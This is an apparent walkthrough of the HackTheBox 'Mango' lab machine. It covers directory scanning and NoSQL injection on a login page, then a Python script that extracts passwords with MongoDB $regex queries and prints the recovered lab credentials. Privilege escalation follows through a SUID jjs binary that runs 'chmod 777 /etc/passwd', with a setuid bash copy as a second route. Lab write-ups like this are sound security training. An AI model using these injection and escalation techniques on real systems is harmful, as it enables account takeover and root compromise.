# HackTheBox - Mango

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhpQNgYZBOtqAAhQOu%2F-MZhxH01KZOkXMzqwaP_%2Fimage.png?alt=media\&token=135b7b46-4563-4dc5-a8db-fddff68975b3)

### Nmap scan results

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhxO9FkRpX2ZcxT0P2%2F-MZhzIHNg4SIvbIruZG9%2Fimage.png?alt=media\&token=09f15af0-7736-4569-9740-603942bbb69c)

We have two webservers, one running with HTTP and other with HTTPS (Secure). Let's add **`staging-order.mango.htb`** to /etc/hosts file. There are two different websites running on staging-order.mango.htb. One on **HTTP** Protocol and other on **HTTPS**.

![HTTPS Website](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhxO9FkRpX2ZcxT0P2%2F-MZi-c1tcP5KAoYDXK8N%2Fimage.png?alt=media\&token=15baa339-c481-46d4-8fb1-fecd78d7d9d5)

![HTTP Website](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZhxO9FkRpX2ZcxT0P2%2F-MZi-h3EsIHlvfsc6xIn%2Fimage.png?alt=media\&token=a4a5a08e-c149-46de-ac98-371d4fcdc9dd)

I tried for SQL Injection on **Mango Search Page** but didn't get anything. Let's scan the website with gobuster for files and directories.

### Scanning with gobuster

```cpp
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://staging-order.mango.htb/ -x php,html,txt -o go-dirscan.out -t 50
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi0Z8HxGt3SOlj1IWP%2Fimage.png?alt=media\&token=0d12c8b5-13f6-4d72-989e-d9a1f0a4d02f)

The login page for insecure i.e HTTP website looks suspicious. Let's try SQL Injection on that.

### Trying SQL Injection on login page

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi1IVSlTTFft1w8DN7%2Fimage.png?alt=media\&token=6fb81329-77bd-4cb7-bc23-362658c89561)

I tried all possible SQL Injection payloads but that didn't gave me anything. `Also tried sqlmap tool to automate the process but no luck :((` 

### Performing NoSQL Injection on login page

We can also try for NoSQL Injection as the name of the box is similar to **`Mongo`** which is a NoSQL database (Uses **Key-Value** pair to store the values)

{% embed url="<https://book.hacktricks.xyz/pentesting-web/nosql-injection>" %}

{% hint style="info" %}
&#x20;**NoSQL injection** vulnerabilities allow attackers to **inject** code into commands for databases that don't use SQL queries, such as **MongoDB**.
{% endhint %}

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi340rGL0VS-c_3PaE%2Fimage.png?alt=media\&token=37b6d15f-e184-42b9-a1c2-5d0027db03e0)

And now if you will check the response, it will be a redirect to **`home.php`** page.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi3Mb1soAFdDx-P74S%2Fimage.png?alt=media\&token=936a70f0-6f32-4af2-93de-e2daec4fb33e)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi0WfjQQwF00RLpi2T%2F-MZi3oNqHaGp4IQvGx9L%2Fimage.png?alt=media\&token=d1474329-d2ea-48b2-b15d-6dd9280ebcd8)

### Extracting usernames and passwords

But that doesn't give us anything. We can also enumerate the data and users using the same method. I have created a script to get all the users and their passwords.

```python
#!/usr/bin/env python

import requests
import string

url = "http://staging-order.mango.htb/index.php"
#chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!&(),-:;<=>@^_{}~`-[]?+"
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]

proxies = {'http':"127.0.0.1:8080"}
passw = "^"

for i in range(20):
    print "[+] Position: %s" % i
    for char in possible_chars:
        payload = {
                "username[$eq]" : "admin",
                "password[$regex]" : "{}".format(passw + char),
                "login" : "login"
        }
        res = requests.post(url,data=payload,allow_redirects=True)
        if "admin@mango.htb" in res.text:
            print("[+] Found: %s" % (passw + char))
            passw += char
            break
        else:
            pass
            
print "[+] Completed"
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi6wenY-rsXjmAoq7m%2Fimage.png?alt=media\&token=626566ad-7845-41bb-9111-3f9b6e5cddfc)

Similarly we can also enumerate the user and get password for that user as well.

```markup
# Got creds
admin : t9KcS3>!0B#2
mango : h3mXK8RhU~f{]f5H
```

### Using SSH to get access as mango user

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi6YdlkgHNUz4GDDBk%2Fimage.png?alt=media\&token=0aebc512-746d-4d06-a717-cdee27d4b2a3)

![Using previously found password for admin](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi7YGvsGlLuZNC-TBj%2Fimage.png?alt=media\&token=2ff4033b-dfa2-468e-bf65-260b51422563)

### Privilege Escalation using [jjs ](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/jjs.html)(Java JavaScript)

{% hint style="info" %}
If you wonder what **jjs** stands for, it stands for **Java** JavaScript. The command is located in the JDK\_HOME\bin directory. The command can be used to run scripts in files or scripts entered on the command-line in interactive mode. It can also be used to execute shell scripts.
{% endhint %}

```erlang
find / -perm -u=s -type f 2>/dev/null
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZi8T7gaIju9Jp_rKkf%2Fimage.png?alt=media\&token=31fb688e-313f-4963-82d0-d1bb75e5feb0)

```java
// JJS Script to get command execution
Java.type('java.lang.Runtime').getRuntime().exec('chmod 777 /etc/passwd')
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZiCmtDA0YvhbCrVV7v%2Fimage.png?alt=media\&token=b89125dc-8668-4f7d-acd3-f52379a47d1d)

Now we can edit the /etc/passwd file and change the root password. -  **`This is one way`**

Another way is to copy the **bash** file to tmp directory and then changing its permission to **`4555`** (Setuid permissions)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZi5XlPkPeom1EXklMf%2F-MZiEEJuhXAoZ5EEUSiO%2Fimage.png?alt=media\&token=c448f943-2f23-4331-ba7e-ac30f35738c4)